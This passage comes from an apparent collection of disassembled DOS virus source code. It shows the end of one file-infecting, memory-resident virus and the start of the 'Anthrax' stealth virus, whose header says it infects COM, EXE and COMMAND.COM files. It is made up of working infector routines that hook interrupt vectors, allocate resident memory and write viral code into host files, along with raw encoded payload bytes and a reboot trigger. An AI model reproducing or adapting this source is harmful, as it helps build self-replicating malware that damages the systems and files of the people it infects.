  3591. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3592. ;                   SUBROUTINE
  3593. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3594.   
  3595. sub_3        proc    near
  3596.         mov    ah,40h                ; '@'
  3597.         mov    cx,589h
  3598.         mov    dx,100h
  3599.         call    sub_6
  3600.         jmp    short loc_22
  3601.         db    90h
  3602.   
  3603. ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3604.   
  3605. sub_4:
  3606.         mov    ax,4202h
  3607.         xor    cx,cx                ; Zero register
  3608.         xor    dx,dx                ; Zero register
  3609.         call    sub_5
  3610.         cmp    ax,589h
  3611.         jb    loc_ret_21            ; Jump if below
  3612.         cmp    ax,0FA00h
  3613.         jae    loc_ret_21            ; Jump if above or =
  3614.         push    ax
  3615.         cmp    byte ptr [si],0E9h
  3616.         jne    loc_19                ; Jump if not equal
  3617.         sub    ax,58Ch
  3618.         cmp    ax,[si+1]
  3619.         jne    loc_19                ; Jump if not equal
  3620.         pop    ax
  3621.         stc                    ; Set carry flag
  3622.         ret
  3623. loc_19:
  3624.         call    sub_3
  3625.         jnc    loc_20                ; Jump if carry=0
  3626.         pop    ax
  3627.         ret
  3628. loc_20:
  3629.         mov    ax,4200h
  3630.         xor    cx,cx                ; Zero register
  3631.         xor    dx,dx                ; Zero register
  3632.         call    sub_5
  3633.         pop    ax
  3634.         sub    ax,3
  3635.         mov    dx,123h
  3636.         mov    si,dx
  3637.         mov    byte ptr cs:[si],0E9h
  3638.         mov    cs:[si+1],ax
  3639.         mov    ah,40h                ; '@'
  3640.         mov    cx,3
  3641.         call    sub_5
  3642.   
  3643. loc_ret_21:
  3644.         ret
  3645. sub_3        endp
  3646.   
  3647.   
  3648. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3649. ;                   SUBROUTINE
  3650. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3651.   
  3652. sub_5        proc    near
  3653. loc_22:
  3654.         pushf                    ; Push flags
  3655.         call    cs:data_31            ; (701E:0131=0)
  3656.         ret
  3657. sub_5        endp
  3658.   
  3659.   
  3660. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3661. ;                   SUBROUTINE
  3662. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3663.   
  3664. sub_6        proc    near
  3665.         push    ax
  3666.         push    ds
  3667.         push    es
  3668.         xor    ax,ax                ; Zero register
  3669.         push    ax
  3670.         pop    ds
  3671.         cli                    ; Disable interrupts
  3672.         les    ax,dword ptr ds:data_7e        ; (0000:0090=18Eh) Load 32 bit ptr
  3673.         mov    cs:data_32,ax            ; (701E:0135=0)
  3674.         mov    cs:data_33,es            ; (701E:0137=0)
  3675.         mov    ax,3ABh
  3676.         mov    ds:data_7e,ax            ; (0000:0090=18Eh)
  3677.         mov    ds:data_8e,cs            ; (0000:0092=1498h)
  3678.         les    ax,dword ptr ds:data_1e        ; (0000:004C=831h) Load 32 bit ptr
  3679.         mov    cs:data_35,ax            ; (701E:013D=0)
  3680.         mov    cs:data_36,es            ; (701E:013F=0)
  3681.         les    ax,cs:data_34            ; (701E:0139=0) Load 32 bit ptr
  3682.         mov    ds:data_1e,ax            ; (0000:004C=831h)
  3683.         mov    ds:data_2e,es            ; (0000:004E=70h)
  3684.         sti                    ; Enable interrupts
  3685.         pop    es
  3686.         pop    ds
  3687.         pop    ax
  3688.         ret
  3689. sub_6        endp
  3690.   
  3691.   
  3692. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3693. ;                   SUBROUTINE
  3694. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3695.   
  3696. sub_7        proc    near
  3697.         push    ax
  3698.         push    ds
  3699.         push    es
  3700.         xor    ax,ax                ; Zero register
  3701.         push    ax
  3702.         pop    ds
  3703.         cli                    ; Disable interrupts
  3704.         les    ax,dword ptr cs:data_32        ; (701E:0135=0) Load 32 bit ptr
  3705.         mov    ds:data_7e,ax            ; (0000:0090=18Eh)
  3706.         mov    ds:data_8e,es            ; (0000:0092=1498h)
  3707.         les    ax,dword ptr cs:data_35        ; (701E:013D=0) Load 32 bit ptr
  3708.         mov    ds:data_1e,ax            ; (0000:004C=831h)
  3709.         mov    ds:data_2e,es            ; (0000:004E=70h)
  3710.         sti                    ; Enable interrupts
  3711.         pop    es
  3712.         pop    ds
  3713.         pop    ax
  3714.         ret
  3715. sub_7        endp
  3716.   
  3717.         db    0B0h, 3, 0CFh, 50h, 53h, 51h
  3718.         db    2Eh, 0A3h, 0FEh, 3, 2Eh, 0A1h
  3719.         db    0F7h, 3, 0A3h, 50h, 4, 2Eh
  3720.         db    0A1h, 0F5h, 3, 8Ah, 0DCh, 0B4h
  3721.         db    9, 0B9h, 1, 0, 0CDh, 10h
  3722.         db    0E8h, 34h, 0, 0E8h, 0B7h, 0
  3723.         db    2Eh, 0A1h, 0F7h, 3, 0A3h, 50h
  3724.         db    4, 0B3h, 7, 0B8h, 7, 9
  3725.         db    0B9h, 1, 0, 0CDh, 10h, 2Eh
  3726.         db    0A1h, 0FEh, 3, 0A3h, 50h, 4
  3727.         db    7, 1Fh
  3728.         db    ']_^ZY[X.'
  3729.         db    0FFh, 2Eh, 0FAh, 3
  3730. data_37        dw    0
  3731. data_38        db    10h
  3732. data_39        db    10h
  3733. data_40        db    0
  3734. data_41        dw    0
  3735. data_42        dw    0
  3736.         db    0, 0, 2Eh, 0A1h, 0F7h, 3
  3737.         db    8Bh, 1Eh, 4Ah, 4, 4Bh, 2Eh
  3738.         db    0F6h, 6, 0F9h, 3, 1, 74h
  3739.         db    0Ch, 3Ah, 0C3h, 72h, 12h, 2Eh
  3740.         db    80h, 36h, 0F9h, 3, 1, 0EBh
  3741.         db    0Ah
  3742. loc_23:
  3743.         cmp    al,0
  3744.         jg    loc_24                ; Jump if >
  3745.         xor    byte ptr cs:data_40,1        ; (701E:03F9=0)
  3746. loc_24:
  3747.         test    byte ptr cs:data_40,2        ; (701E:03F9=0)
  3748.         jz    loc_25                ; Jump if zero
  3749.         cmp    ah,18h
  3750.         jb    loc_26                ; Jump if below
  3751.         xor    byte ptr cs:data_40,2        ; (701E:03F9=0)
  3752.         jmp    short loc_26
  3753. loc_25:
  3754.         cmp    ah,0
  3755.         jg    loc_26                ; Jump if >
  3756.         xor    byte ptr cs:data_40,2        ; (701E:03F9=0)
  3757. loc_26:
  3758.         cmp    byte ptr cs:data_37,20h        ; (701E:03F5=0) ' '
  3759.         je    loc_27                ; Jump if equal
  3760.         db    2Eh
  3761. data_44        dw    3E80h
  3762.         db    0F8h, 3, 0, 74h, 6, 2Eh
  3763.         db    80h, 36h, 0F9h, 3, 2
  3764. loc_27:
  3765.         test    byte ptr cs:data_40,1        ; (701E:03F9=0)
  3766.         jz    loc_28                ; Jump if zero
  3767.         inc    cs:data_38            ; (701E:03F7=10h)
  3768.         jmp    short loc_29
  3769. loc_28:
  3770.         dec    cs:data_38            ; (701E:03F7=10h)
  3771. loc_29:
  3772.         test    byte ptr cs:data_40,2        ; (701E:03F9=0)
  3773.         jz    loc_30                ; Jump if zero
  3774.         inc    cs:data_39            ; (701E:03F8=10h)
  3775.         jmp    short loc_ret_31
  3776. loc_30:
  3777.         dec    cs:data_39            ; (701E:03F8=10h)
  3778.   
  3779. loc_ret_31:
  3780.         ret
  3781.   
  3782. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3783. ;                   SUBROUTINE
  3784. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3785.   
  3786. sub_8        proc    near
  3787.         mov    ax,word ptr cs:data_38        ; (701E:03F7=1010h)
  3788.         mov    ds:data_11e,ax            ; (0000:0450=184Fh)
  3789.         mov    bh,data_55            ; (0000:0462=0D400h)
  3790.         mov    ah,8
  3791.         int    10h                ; Video display   ah=functn 08h
  3792.                             ;  get char al & attrib ah @curs
  3793.         mov    cs:data_37,ax            ; (701E:03F5=0)
  3794.         ret
  3795. sub_8        endp
  3796.   
  3797.         db    50h, 53h, 51h, 52h, 56h, 57h
  3798.         db    55h, 1Eh, 6, 33h, 0C0h, 50h
  3799.         db    1Fh, 81h, 3Eh, 70h, 0, 0AEh
  3800.         db    3, 74h, 35h, 0A1h, 6Ch, 4
  3801.         db    8Bh, 16h, 6Eh, 4, 0B9h, 0FFh
  3802.         db    0FFh, 0F7h, 0F1h, 3Dh, 10h, 0
  3803.         db    75h, 24h, 0FAh, 8Bh, 2Eh, 50h
  3804.         db    4, 0E8h, 0BEh, 0FFh, 89h, 2Eh
  3805.         db    50h, 4, 0C4h, 6, 70h, 0
  3806.         db    2Eh, 0A3h, 0FAh, 3, 2Eh, 8Ch
  3807.         db    6, 0FCh, 3, 0C7h, 6, 70h
  3808.         db    0, 0AEh, 3, 8Ch, 0Eh, 72h
  3809.         db    0, 0FBh
  3810. loc_32:
  3811.         mov    ah,2
  3812.         int    14h                ; RS-232   dx=com1, ah=func 02h
  3813.                             ;  get char al, ah=return status
  3814.         cmp    al,31h                ; '1'
  3815.         je    loc_33                ; Jump if equal
  3816.         jnz    loc_34                ; Jump if not zero
  3817. loc_33:
  3818.         int    19h                ; Bootstrap loader
  3819. loc_34:
  3820.         pop    es
  3821.         pop    ds
  3822.         pop    bp
  3823.         pop    di
  3824.         pop    si
  3825.         pop    dx
  3826.         pop    cx
  3827.         pop    bx
  3828.         pop    ax
  3829.         ret
  3830.   
  3831. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3832. ;                   SUBROUTINE
  3833. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3834.   
  3835. sub_9        proc    near
  3836.         mov    dx,10h
  3837.         mul    dx                ; dx:ax = reg * ax
  3838.         ret
  3839. sub_9        endp
  3840.   
  3841.   
  3842. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3843. ;                   SUBROUTINE
  3844. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3845.   
  3846. sub_10        proc    near
  3847.         xor    ax,ax                ; Zero register
  3848.         xor    bx,bx                ; Zero register
  3849.         xor    cx,cx                ; Zero register
  3850.         xor    dx,dx                ; Zero register
  3851.         xor    si,si                ; Zero register
  3852.         xor    di,di                ; Zero register
  3853.         xor    bp,bp                ; Zero register
  3854.         ret
  3855. sub_10        endp
  3856.   
  3857.         db    1Eh, 0E8h, 0, 0
  3858.   
  3859. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  3860. ;                   SUBROUTINE
  3861. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  3862.   
  3863. sub_11        proc    near
  3864.         mov    ax,4B4Dh
  3865.         int    21h                ; DOS Services  ah=function 4Bh
  3866.                             ;  run progm @ds:dx, parm @es:bx
  3867.         jc    loc_35                ; Jump if carry Set
  3868.         jmp    loc_45
  3869. loc_35:
  3870.         pop    si
  3871.         push    si
  3872.         mov    di,si
  3873.         xor    ax,ax                ; Zero register
  3874.         push    ax
  3875.         pop    ds
  3876.         les    ax,dword ptr ds:data_1e        ; (0000:004C=831h) Load 32 bit ptr
  3877.         mov    cs:data_53e[si],ax        ; (701E:FC26=0)
  3878.         mov    cs:data_54e[si],es        ; (701E:FC28=0)
  3879.         les    bx,dword ptr ds:data_5e        ; (0000:0084=6E3h) Load 32 bit ptr
  3880.         mov    cs:data_51e[di],bx        ; (701E:FC1E=0)
  3881.         mov    cs:data_52e[di],es        ; (701E:FC20=0)
  3882.         mov    ax,ds:data_9e            ; (0000:0102=0CC00h)
  3883.         cmp    ax,0F000h
  3884.         jne    loc_43                ; Jump if not equal
  3885.         mov    dl,80h
  3886.         mov    ax,ds:data_10e            ; (0000:0106=326h)
  3887.         cmp    ax,0F000h
  3888.         je    loc_36                ; Jump if equal
  3889.         cmp    ah,0C8h
  3890.         jb    loc_43                ; Jump if below
  3891.         cmp    ah,0F4h
  3892.         jae    loc_43                ; Jump if above or =
  3893.         test    al,7Fh
  3894.         jnz    loc_43                ; Jump if not zero
  3895.         mov    ds,ax
  3896.         cmp    word ptr ds:data_15e,0AA55h    ; (0326:0000=6A7h)
  3897.         jne    loc_43                ; Jump if not equal
  3898.         mov    dl,ds:data_16e            ; (0326:0002=70h)
  3899. loc_36:
  3900.         mov    ds,ax
  3901.         xor    dh,dh                ; Zero register
  3902.         mov    cl,9
  3903.         shl    dx,cl                ; Shift w/zeros fill
  3904.         mov    cx,dx
  3905.         xor    si,si                ; Zero register
  3906.   
  3907. locloop_37:
  3908.         lodsw                    ; String [si] to ax
  3909.         cmp    ax,0FA80h
  3910.         jne    loc_38                ; Jump if not equal
  3911.         lodsw                    ; String [si] to ax
  3912.         cmp    ax,7380h
  3913.         je    loc_39                ; Jump if equal
  3914.         jnz    loc_40                ; Jump if not zero
  3915. loc_38:
  3916.         cmp    ax,0C2F6h
  3917.         jne    loc_41                ; Jump if not equal
  3918.         lodsw                    ; String [si] to ax
  3919.         cmp    ax,7580h
  3920.         jne    loc_40                ; Jump if not equal
  3921. loc_39:
  3922.         inc    si
  3923.         lodsw                    ; String [si] to ax
  3924.         cmp    ax,40CDh
  3925.         je    loc_42                ; Jump if equal
  3926.         sub    si,3
  3927. loc_40:
  3928.         dec    si
  3929.         dec    si
  3930. loc_41:
  3931.         dec    si
  3932.         loop    locloop_37            ; Loop if cx > 0
  3933.   
  3934.         jmp    short loc_43
  3935. loc_42:
  3936.         sub    si,7
  3937.         mov    cs:data_53e[di],si        ; (701E:FC26=0)
  3938.         mov    cs:data_54e[di],ds        ; (701E:FC28=0)
  3939. loc_43:
  3940.         mov    ah,62h                ; 'b'
  3941.         int    21h                ; DOS Services  ah=function 62h
  3942.                             ;  get progrm seg prefix addr bx
  3943.         mov    es,bx
  3944.         mov    ah,49h                ; 'I'
  3945.         int    21h                ; DOS Services  ah=function 49h
  3946.                             ;  release memory block, es=seg
  3947.         mov    bx,0FFFFh
  3948.         mov    ah,48h                ; 'H'
  3949.         int    21h                ; DOS Services  ah=function 48h
  3950.                             ;  allocate memory, bx=bytes/16
  3951.         sub    bx,5Ah
  3952.         nop
  3953.         jc    loc_45                ; Jump if carry Set
  3954.         mov    cx,es
  3955.         stc                    ; Set carry flag
  3956.         adc    cx,bx
  3957.         mov    ah,4Ah                ; 'J'
  3958.         int    21h                ; DOS Services  ah=function 4Ah
  3959.                             ;  change mem allocation, bx=siz
  3960.         mov    bx,59h
  3961.         stc                    ; Set carry flag
  3962.         sbb    es:data_19e,bx            ; (06E3:0002=2342h)
  3963.         push    es
  3964.         mov    es,cx
  3965.         mov    ah,4Ah                ; 'J'
  3966.         int    21h                ; DOS Services  ah=function 4Ah
  3967.                             ;  change mem allocation, bx=siz
  3968.         mov    ax,es
  3969.         dec    ax
  3970.         mov    ds,ax
  3971.         mov    word ptr ds:data_18e,8        ; (0688:0001=0FF17h)
  3972.         call    sub_9
  3973.         mov    bx,ax
  3974.         mov    cx,dx
  3975.         pop    ds
  3976.         mov    ax,ds
  3977.         call    sub_9
  3978.         add    ax,ds:data_20e            ; (06E3:0006=2344h)
  3979.         adc    dx,0
  3980.         sub    ax,bx
  3981.         sbb    dx,cx
  3982.         jc    loc_44                ; Jump if carry Set
  3983.         sub    ds:data_20e,ax            ; (06E3:0006=2344h)
  3984. loc_44:
  3985.         mov    si,di
  3986.         xor    di,di                ; Zero register
  3987.         push    cs
  3988.         pop    ds
  3989.         sub    si,413h
  3990.         mov    cx,589h
  3991.         inc    cx
  3992.         rep    movsb                ; Rep while cx>0 Mov [si] to es:[di]
  3993.         mov    ah,62h                ; 'b'
  3994.         int    21h                ; DOS Services  ah=function 62h
  3995.                             ;  get progrm seg prefix addr bx
  3996.         dec    bx
  3997.         mov    ds,bx
  3998.         mov    byte ptr ds:data_17e,5Ah    ; (0687:0000=81h) 'Z'
  3999.         mov    dx,142h
  4000.         xor    ax,ax                ; Zero register
  4001.         push    ax
  4002.         pop    ds
  4003.         mov    ax,es
  4004.         sub    ax,10h
  4005.         mov    es,ax
  4006.         cli                    ; Disable interrupts
  4007.         mov    ds:data_5e,dx            ; (0000:0084=6E3h)
  4008.         mov    ds:data_6e,es            ; (0000:0086=161Ah)
  4009.         sti                    ; Enable interrupts
  4010.         dec    byte ptr ds:data_14e        ; (0000:047B=0)
  4011. loc_45:
  4012.         pop    si
  4013.         cmp    word ptr cs:data_46e[si],5A4Dh    ; (701E:FBF0=0)
  4014.         jne    loc_46                ; Jump if not equal
  4015.         pop    ds
  4016.         mov    ax,cs:data_50e[si]        ; (701E:FC14=0)
  4017.         mov    bx,cs:data_49e[si]        ; (701E:FC12=0)
  4018.         push    cs
  4019.         pop    cx
  4020.         sub    cx,ax
  4021.         add    cx,bx
  4022.         push    cx
  4023.         push    word ptr cs:data_48e[si]    ; (701E:FC10=0)
  4024.         push    ds
  4025.         pop    es
  4026.         call    sub_10
  4027.         ret                    ; Return far
  4028. loc_46:
  4029.         pop    ax
  4030.         mov    ax,cs:data_46e[si]        ; (701E:FBF0=0)
  4031.         mov    cs:data_21,ax            ; (701E:0100=0CE9h)
  4032.         mov    ax,cs:data_47e[si]        ; (701E:FBF2=0)
  4033.         mov    cs:data_22,ax            ; (701E:0102=0C304h)
  4034.         mov    ax,100h
  4035.         push    ax
  4036.         push    cs
  4037.         pop    ds
  4038.         push    ds
  4039.         pop    es
  4040.         call    sub_10
  4041.         ret
  4042. sub_11        endp
  4043.   
  4044.   
  4045. code_seg_a    ends
  4046.   
  4047.   
  4048.   
  4049.         end    start
  4050.  
  4051. done
  4052.  
  4053. ;**************************************************************************
  4054. ;**                        ANTHRAX VIRUS                                 **
  4055. ;**      Created: 2 Jan 90           Programmer: (c) Damage, Inc.        **
  4056. ;** [NukE] Notes: Another Stealth Type of Virus! and this one is Detected**
  4057. ;**               by Scan (McAfee & Assc.) And does copy itself to *.COM **
  4058. ;**               *.EXE and the Command.Com and is Memory Resident!      **
  4059. ;**                                                                      **
  4060. ;** Sources brought to you by -> Rock Steady [NukE]s Head Programmer!    **
  4061. ;**                                                                      **
  4062. ;**************************************************************************
  4063.  
  4064. .286p
  4065.  
  4066. DATA_1E        EQU    46CH            ; (0000:046C=2DH)
  4067. DATA_2E        EQU    4            ; (65AC:0004=0)
  4068. DATA_3E        EQU    7            ; (65AC:0007=0)
  4069. DATA_10E    EQU    5FEH            ; (65AC:05FE=0)
  4070.  
  4071. SEG_A        SEGMENT    BYTE PUBLIC
  4072.         ASSUME    CS:SEG_A, DS:SEG_A
  4073.  
  4074.  
  4075.         ORG    100h
  4076.  
  4077. ANTHRAX        PROC    FAR
  4078.  
  4079. START:
  4080.         JMP    LOC_24            ; (043B)
  4081.         DB    13 DUP (0)
  4082.         DB    95H, 8CH, 0C8H, 2DH, 0, 0
  4083.         DB    0BAH, 0, 0, 50H, 52H, 1EH
  4084.         DB    33H, 0C9H, 8EH, 0D9H, 0BEH, 4CH
  4085.         DB    0, 0B8H, 0CDH, 0, 8CH, 0CAH
  4086.         DB    87H, 44H, 44H, 87H, 54H, 46H
  4087.         DB    52H, 50H, 0C4H, 1CH, 0B4H, 13H
  4088.         DB    0CDH, 2FH, 6, 53H, 0B4H, 13H
  4089.         DB    0CDH, 2FH, 58H, 5AH, 87H, 4
  4090.         DB    87H, 54H, 2, 52H, 50H, 51H
  4091.         DB    56H, 0A0H, 3FH, 4, 0A8H, 0FH
  4092.         DB    75H, 6CH, 0EH, 7, 0BAH, 80H
  4093.         DB    0, 0B1H, 3, 0BBH, 77H, 6
  4094.         DB    0B8H, 1, 2, 50H, 0CDH, 13H
  4095.         DB    58H, 0B1H, 1, 0BBH, 0, 4
  4096.         DB    0CDH, 13H, 0EH, 1FH, 0BEH, 9BH
  4097.         DB    3, 8BH, 0FBH, 0B9H, 5EH, 0
  4098.         DB    56H, 0F3H, 0A6H, 5EH, 8BH, 0FBH
  4099.         DB    0B9H, 62H, 0, 56H, 0F3H, 0A4H
  4100.         DB    5FH, 0BEH, 12H, 8, 0B9H, 65H
  4101.         DB    0, 0F3H, 0A4H, 74H, 1EH, 89H
  4102.         DB    4DH, 0E9H, 0B1H, 5CH, 89H, 4DH
  4103.         DB    9BH, 88H, 6DH, 0DCH, 0B1H, 2
  4104.         DB    33H, 0DBH, 0B8H, 2, 3, 0CDH
  4105.         DB    13H, 49H, 0BBH, 0, 4, 0B8H
  4106.         DB    1, 3, 0CDH, 13H, 49H, 0B4H
  4107.         DB    19H, 0CDH, 21H, 50H, 0B2H, 2
  4108.         DB    0B4H, 0EH, 0CDH, 21H, 0B7H, 2
  4109.         DB    0E8H, 87H, 1, 5AH, 0B4H, 0EH
  4110.         DB    0CDH, 21H, 5EH, 1FH, 8FH, 4
  4111.         DB    8FH, 44H, 2, 8FH, 44H, 44H
  4112.         DB    8FH, 44H, 46H, 1FH, 1EH, 7
  4113.         DB    95H, 0CBH
  4114. copyright    DB    '(c) Damage, Inc.'
  4115.         DB    0, 0B0H, 3, 0CFH, 6, 1EH
  4116.         DB    57H, 56H, 50H, 33H, 0C0H, 8EH
  4117.         DB    0D8H, 0BEH, 86H, 0, 0EH, 7
  4118.         DB    0BFH, 8, 6, 0FDH, 0ADH, 0ABH
  4119.         DB    0A5H, 0AFH, 87H, 0F7H, 0ADH, 0FCH
  4120.         DB    74H, 11H, 1EH, 7, 0AFH, 0B8H
  4121.         DB    7, 1, 0ABH, 8CH, 0C8H, 0ABH
  4122.         DB    8EH, 0D8H, 0BFH, 68H, 0, 0A5H
  4123.         DB    0A5H, 58H, 5EH, 5FH, 1FH, 7
  4124.         DB    2EH, 0FFH, 2EH, 0, 6, 6
  4125.         DB    1EH, 57H, 56H, 52H, 51H, 53H
  4126.         DB    50H, 0EH, 1FH, 0BEH, 6, 6
  4127.         DB    33H, 0C9H, 8EH, 0C1H, 0BFH, 84H
  4128.         DB    0, 0A5H, 0A5H, 0B4H, 52H, 0CDH
  4129.         DB    21H, 26H, 8BH, 47H, 0FEH, 8EH
  4130.         DB    0D8H, 0BBH, 3, 0, 3, 7
  4131.         DB    40H, 8EH, 0D8H, 81H, 7, 80H
  4132.         DB    0, 0EH, 7, 0B7H, 12H, 0E8H
  4133.         DB    0F2H, 0, 58H, 5BH, 59H, 5AH
  4134.         DB    5EH, 5FH, 1FH, 7, 2EH, 0FFH
  4135.         DB    2EH, 6, 6
  4136.   
  4137. LOC_RET_1:
  4138.         RETN
  4139.         DB    91H, 0AEH, 0B4H, 0A8H, 0BFH
  4140.         DB    20H, 31H, 39H, 39H, 30H
  4141.   
  4142. ANTHRAX        ENDP
  4143.   
  4144. ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
  4145. ;                   SUBROUTINE
  4146. ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
  4147.   
  4148. SUB_1        PROC    NEAR
  4149.         MOV    AX,3D00H
  4150.         INT    21H            ; DOS Services  ah=function 3Dh
  4151.                         ;  open file, al=mode,name@ds:dx
  4152.         JC    LOC_RET_1        ; Jump if carry Set
  4153.         XCHG    AX,BX
  4154.         MOV    AX,1220H
  4155.         INT    2FH            ; Multiplex/Spooler al=func 20h
  4156.         PUSH    BX
  4157.         MOV    BL,ES:[DI]
  4158.         MOV    AX,1216H
  4159.         INT    2FH            ; Multiplex/Spooler al=func 16h
  4160.         POP    BX
  4161.         MOV    SI,462H
  4162.         MOV    DX,SI
  4163.         MOV    CL,18H
  4164.         MOV    AH,3FH            ; '?'
  4165.         INT    21H            ; DOS Services  ah=function 3Fh
  4166.                         ;  read file, cx=bytes, to ds:dx
  4167.         XOR    AX,CX
  4168.         JNZ    LOC_7            ; Jump if not zero
  4169.         PUSH    ES
  4170.         POP    DS
  4171.         MOV    BYTE PTR [DI+2],2
  4172.         XOR    DX,DX            ; Zero register
  4173. LOC_2:
  4174.         IN    AL,DX            ; port 0, DMA-1 bas&add ch 0
  4175.         CMP    AL,10H
  4176.         JB    LOC_2            ; Jump if below
  4177.         ADD    AX,[DI+11H]
  4178.         ADC    DX,[DI+13H]
  4179.         AND    AL,0F0H
  4180.         CMP    AX,0FB00H
  4181.         JAE    LOC_7            ; Jump if above or =
  4182.         MOV    [DI+15H],AX
  4183.         MOV    [DI+17H],DX
  4184.         PUSH    CS
  4185.         POP    DS
  4186.         PUSH    AX
  4187.         MOV    CL,10H
  4188.         DIV    CX            ; ax,dx rem=dx:ax/reg
  4189.         SUB    AX,[SI+8]
  4190.         MOV    CX,AX
  4191.         SUB    AX,[SI+16H]
  4192.         MOV    DS:DATA_2E,AX        ; (65AC:0004=0)
  4193.         LODSW                ; String [si] to ax
  4194.         XOR    AX,5A4DH
  4195.         JZ    LOC_3            ; Jump if zero
  4196.         XOR    AX,1717H
  4197. LOC_3:
  4198.         PUSHF                ; Push flags
  4199.         JNZ    LOC_4            ; Jump if not zero
  4200.         MOV    [SI],AX
  4201.         CMP    AX,[SI+0AH]
  4202.         XCHG    AX,[SI+12H]
  4203.         MOV    DS:DATA_3E,AX        ; (65AC:0007=0)
  4204.         MOV    [SI+14H],CX
  4205.         MOV    CX,4DCH
  4206.         JZ    LOC_5            ; Jump if zero
  4207.         ADD    WORD PTR [SI+8],48H
  4208. LOC_4:
  4209.         MOV    CX,65H
  4210. LOC_5:
  4211.         PUSH    CX
  4212.         MOV    CX,39BH
  4213.         MOV    AH,40H            ; '@'
  4214.         INT    21H            ; DOS Services  ah=function 40h
